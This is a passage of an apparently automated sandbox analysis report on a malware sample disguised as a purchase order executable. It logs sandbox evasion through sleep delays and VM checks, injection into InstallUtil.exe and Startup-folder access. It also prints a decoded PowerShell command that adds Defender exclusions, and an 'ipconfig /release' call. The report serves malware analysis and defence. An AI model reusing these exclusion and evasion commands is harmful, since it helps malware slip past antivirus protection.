                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -96610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -96485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -96360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -96221s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -96094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -95985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -95844s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -95735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -95610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -95485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -95360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -95235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -95110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94747s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94625s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94391s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94266s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94141s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -94030s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep count: 31 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -28592453314249787s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -100000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3692Thread sleep count: 8535 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99875s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3692Thread sleep count: 1319 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99765s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99656s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99547s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99437s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99328s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99219s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99109s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -99000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -98891s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -98766s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -98641s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -98531s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -98421s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -98312s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -98203s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -98093s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97984s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97875s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97756s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97641s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97531s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97419s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97312s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97203s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -97092s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96984s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96875s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96765s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96656s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96546s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96437s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96328s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96219s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96109s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -96000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95891s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95781s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95672s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95562s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95453s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95343s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95234s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95125s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -95016s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -94891s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -94781s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -94661s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1724Thread sleep time: -94547s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ofg.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99311Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99198Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99085Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98982Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98838Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96221Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94747Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94500Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94030Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99765
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99437
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99109
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98766
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98421
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98312
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98203
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98093
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97984
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97756
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97419
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97312
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97203
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97092
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96984
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96765
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96656
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96546
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96437
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96109
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95672
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95562
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95343
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95125
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94661
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94547
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: ofg.exe, 00000012.00000002.1630701486.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: ofg.exe, 00000012.00000002.1630701486.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 0000000D.00000002.1587542540.00000000054B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                      Source: InstallUtil.exe, 00000016.00000002.2398271274.0000000006090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1389140626.00000000008B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                      Source: ofg.exe, 00000012.00000002.1629413578.0000000000C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\Desktop\purchase order T&B19-20PO128.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\Desktop\purchase order T&B19-20PO128.exe;Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\ofg.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Roaming\ofg.exe
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\Desktop\purchase order T&B19-20PO128.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\Desktop\purchase order T&B19-20PO128.exe;Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\ofg.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Roaming\ofg.exeJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: DF1008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C88008Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
